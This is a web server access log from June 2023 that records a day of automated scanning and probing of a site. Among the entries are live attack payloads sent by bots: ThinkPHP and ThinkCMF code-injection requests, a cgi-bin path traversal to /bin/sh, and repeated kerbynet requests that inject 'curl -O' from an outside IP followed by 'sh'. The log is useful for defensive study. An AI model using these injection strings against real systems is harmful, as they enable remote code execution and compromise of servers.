173.252.83.11 - - [24/Jun/2023:02:08:42 +0200] "GET /cron.php?cron_type=tidy_cache&%3Bsid=0ca628b2ae5a9caaa14c3c45f7aa92b4 HTTP/1.1" 404 290 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 95.214.27.239 - - [24/Jun/2023:02:20:50 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 185.180.143.48 - - [24/Jun/2023:02:28:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 83.97.73.89 - - [24/Jun/2023:02:38:02 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 176.120.237.142 - - [24/Jun/2023:02:41:20 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 111.21.197.66 - - [24/Jun/2023:02:59:44 +0200] "HEAD / HTTP/1.1" 200 - "-" "-" 111.21.197.66 - - [24/Jun/2023:02:59:45 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 111.21.197.66 - - [24/Jun/2023:02:59:46 +0200] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 - "-" "-" 47.252.30.45 - - [24/Jun/2023:03:15:35 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 47.252.30.45 - - [24/Jun/2023:03:17:37 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 47.252.30.45 - - [24/Jun/2023:03:17:38 +0200] "GET /1687565503 HTTP/1.1" 404 355 "-" "Mozilla/5.0" 47.252.30.45 - - [24/Jun/2023:03:17:38 +0200] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0" 47.252.30.45 - - [24/Jun/2023:03:17:38 +0200] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0" 47.252.30.45 - - [24/Jun/2023:03:17:38 +0200] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0" 47.252.30.45 - - [24/Jun/2023:03:17:48 +0200] "\x16\x03\x01\x02" 400 383 "-" "-" 47.252.30.45 - - [24/Jun/2023:03:17:53 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 47.252.30.45 - - [24/Jun/2023:03:17:53 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 47.252.30.45 - - [24/Jun/2023:03:17:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Openwave/ UCWEB7.0.2.37/28/999" 47.252.30.45 - - [24/Jun/2023:03:17:55 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "curl/7.75.0" 47.252.30.45 - - [24/Jun/2023:03:17:55 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "curl/7.75.0" 88.212.253.156 - - [24/Jun/2023:03:22:00 +0200] "GET /style.php?sig=rename HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 173.252.83.2 - - [24/Jun/2023:03:23:50 +0200] "GET /cron.php?cron_type=tidy_cache&%3Bsid=e8c430827f94307b7516b451e4f30923 HTTP/1.1" 404 290 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 90.156.169.17 - - [24/Jun/2023:03:24:59 +0200] "GET /style.php?sig=rename HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.127 Mobile Safari/537.36" 144.172.73.51 - - [24/Jun/2023:03:25:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 210.16.189.4 - - [24/Jun/2023:03:31:20 +0200] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:26 +0200] "GET /?author=1 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:27 +0200] "GET /?author=2 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:33 +0200] "GET /?author=3 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:43 +0200] "GET /?author=4 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:44 +0200] "GET /?author=5 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:31:45 +0200] "GET /?author=6 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:32:17 +0200] "GET /?author=8 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:32:18 +0200] "GET /?author=9 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:32:58 +0200] "GET /?author=11 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:33:28 +0200] "-" 408 - "-" "-" 210.16.189.4 - - [24/Jun/2023:03:33:53 +0200] "GET /?author=12 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:33:53 +0200] "GET /?author=13 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:33:54 +0200] "GET /?author=14 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:33:55 +0200] "GET /?author=15 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:33:55 +0200] "GET /?author=16 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:34:28 +0200] "GET /?author=18 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 210.16.189.4 - - [24/Jun/2023:03:34:29 +0200] "GET /?author=19 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 83.97.73.89 - - [24/Jun/2023:03:37:03 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.105 - - [24/Jun/2023:03:40:45 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.41.206.56 - - [24/Jun/2023:03:42:16 +0200] "HEAD / HTTP/1.1" 200 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" 91.41.206.56 - - [24/Jun/2023:03:42:16 +0200] "GET /wp-login.php HTTP/1.1" 404 294 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" 91.41.206.56 - - [24/Jun/2023:03:42:19 +0200] "GET /wordpress/wp-login.php HTTP/1.1" 404 300 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" 91.41.206.56 - - [24/Jun/2023:03:42:19 +0200] "GET /blog/wp-login.php HTTP/1.1" 404 297 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" 91.41.206.56 - - [24/Jun/2023:03:42:19 +0200] "GET /wp/wp-login.php HTTP/1.1" 404 295 "http://smtpo.financetrainer.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" 198.235.24.41 - - [24/Jun/2023:03:42:23 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 83.97.73.89 - - [24/Jun/2023:03:46:34 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 87.121.221.234 - - [24/Jun/2023:04:07:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 183.136.225.46 - - [24/Jun/2023:04:37:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 83.97.73.89 - - [24/Jun/2023:04:37:31 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 183.136.225.46 - - [24/Jun/2023:04:37:31 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.46 - - [24/Jun/2023:04:37:32 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 42.2.225.172 - - [24/Jun/2023:04:51:50 +0200] "CONNECT api64.ipify.org:80 HTTP/1.1" 200 423 "-" "-" 90.156.169.6 - - [24/Jun/2023:04:55:54 +0200] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_wp_admin_taxonomies.css HTTP/1.1" 404 430 "-" "Mozilla/5.0 (Android 10; Mobile; rv:81.0) Gecko/81.0 Firefox/81.0" 83.97.73.89 - - [24/Jun/2023:05:18:08 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.56.252.14 - - [24/Jun/2023:05:37:52 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:84.0) Gecko/20100101 Firefox/84.0" 66.175.213.4 - - [24/Jun/2023:06:02:27 +0200] "\x16\x03\x01" 400 383 "-" "-" 51.158.37.186 - - [24/Jun/2023:06:21:42 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 51.158.37.186 - - [24/Jun/2023:06:21:43 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 83.97.73.89 - - [24/Jun/2023:06:22:25 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.89 - - [24/Jun/2023:06:25:08 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.180.143.81 - - [24/Jun/2023:06:36:14 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 180.149.125.166 - - [24/Jun/2023:06:39:08 +0200] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" 79.124.56.98 - - [24/Jun/2023:06:53:35 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" 103.186.91.35 - - [24/Jun/2023:07:07:06 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 83.97.73.89 - - [24/Jun/2023:07:15:45 +0200] "GET /console/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.137.206.143 - - [24/Jun/2023:07:39:07 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 185.183.15.63 - - [24/Jun/2023:07:58:54 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.27.1" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "POST /core/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "GET /core/.env HTTP/1.1" 404 283 "-" "python-requests/2.27.1" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 91.121.59.189 - - [24/Jun/2023:08:13:32 +0200] "POST /core/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 83.97.73.89 - - [24/Jun/2023:08:26:46 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.199.108.217 - - [24/Jun/2023:08:27:19 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 83.97.73.89 - - [24/Jun/2023:08:54:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 162.216.149.244 - - [24/Jun/2023:08:57:21 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 83.97.73.89 - - [24/Jun/2023:10:10:43 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.233.19.122 - - [24/Jun/2023:10:13:04 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.89 - - [24/Jun/2023:11:04:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.89 - - [24/Jun/2023:11:23:03 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 205.210.31.73 - - [24/Jun/2023:11:23:08 +0200] "\x16\x03\x01" 400 383 "-" "-" 83.97.73.89 - - [24/Jun/2023:12:00:05 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.15 - - [24/Jun/2023:12:01:15 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 165.231.182.90 - - [24/Jun/2023:12:17:21 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 179.43.177.244 - - [24/Jun/2023:12:35:52 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 66.175.213.4 - - [24/Jun/2023:13:42:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 94.102.61.10 - - [24/Jun/2023:13:42:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 64.62.197.26 - - [24/Jun/2023:13:43:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 64.62.197.31 - - [24/Jun/2023:13:45:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41" 64.62.197.27 - - [24/Jun/2023:13:45:54 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 64.227.129.246 - - [24/Jun/2023:14:45:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 94.102.61.10 - - [24/Jun/2023:15:02:20 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0" 87.121.221.234 - - [24/Jun/2023:15:10:14 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 179.43.177.244 - - [24/Jun/2023:15:16:49 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 45.128.232.62 - - [24/Jun/2023:15:24:47 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.241.211.12 - - [24/Jun/2023:15:31:10 +0200] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:28 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 4.71.37.46 - - [24/Jun/2023:15:50:29 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 371 "-" "-" 95.214.27.50 - - [24/Jun/2023:16:23:36 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 137.184.199.197 - - [24/Jun/2023:16:31:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0" 46.246.122.190 - - [24/Jun/2023:17:01:31 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 85.217.144.116 - - [24/Jun/2023:17:32:54 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 85.217.144.116 - - [24/Jun/2023:17:32:54 +0200] "GET /wp-content/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 194.165.16.72 - - [24/Jun/2023:18:18:41 +0200] "\x03" 400 383 "-" "-" 198.235.24.28 - - [24/Jun/2023:18:21:17 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 216.131.88.117 - - [24/Jun/2023:19:16:07 +0200] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" 185.180.143.81 - - [24/Jun/2023:19:22:44 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 192.241.210.23 - - [24/Jun/2023:19:42:19 +0200] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 192.241.227.38 - - [24/Jun/2023:19:42:53 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x" 193.56.252.251 - - [24/Jun/2023:19:52:36 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 78.121.250.75 - - [24/Jun/2023:20:02:58 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 179.108.233.114 - - [24/Jun/2023:20:08:17 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 192.241.213.77 - - [24/Jun/2023:20:17:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 77.32.68.242 - - [24/Jun/2023:20:46:51 +0200] "GET /wp-login.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 152.89.198.113 - - [24/Jun/2023:23:02:42 +0200] "\x03" 400 383 "-" "-" 109.237.98.226 - - [24/Jun/2023:23:08:30 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.98.226 - - [24/Jun/2023:23:08:30 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 198.235.24.205 - - [24/Jun/2023:23:10:03 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 178.128.152.119 - - [24/Jun/2023:23:30:01 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0" 66.249.64.67 - - [25/Jun/2023:00:25:09 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.69 - - [25/Jun/2023:00:25:09 +0200] "GET /~ridersde/joomla/ HTTP/1.1" 404 301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 167.248.133.34 - - [25/Jun/2023:00:29:12 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.34 